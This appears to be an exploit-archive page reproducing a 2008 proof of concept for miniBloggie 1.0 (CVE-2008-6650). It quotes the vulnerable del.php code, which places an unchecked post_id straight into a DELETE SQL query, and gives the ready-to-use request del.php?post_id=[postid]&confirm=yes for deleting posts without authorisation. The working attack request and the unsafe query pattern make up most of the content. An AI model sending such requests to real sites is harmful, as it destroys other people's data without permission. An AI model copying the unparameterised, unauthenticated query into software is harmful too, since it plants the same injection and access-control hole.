[] NeoSense
E X P L O I T S
title author type platform port cve id

miniBloggie 1.0 - 'del.php' Arbitrary Delete Post

Author: Cod3rZ
type: webapps
platform: php
port: 
date_added: 2008-05-07 
date_updated: 2016-11-28 
verified: 1 
codes: OSVDB-53388;CVE-2008-6650 
tags: 
aliases:  
screenshot_url:  
application_url: 
# MiniBloggie Arbitrary Delete Post Vulnerability
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# PoC:
#  if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
#  if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
# [...]
# elseif ($confirm=="yes") {
# [...]
# $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
# $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
# Vuln: http://site/del.php?post_id=[postid]&confirm=yes
# Ex:   http://127.0.0.1/del.php?post_id=1&confirm=yes
# Visit http://devilsnight.altervista.org

# milw0rm.com [2008-05-08]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.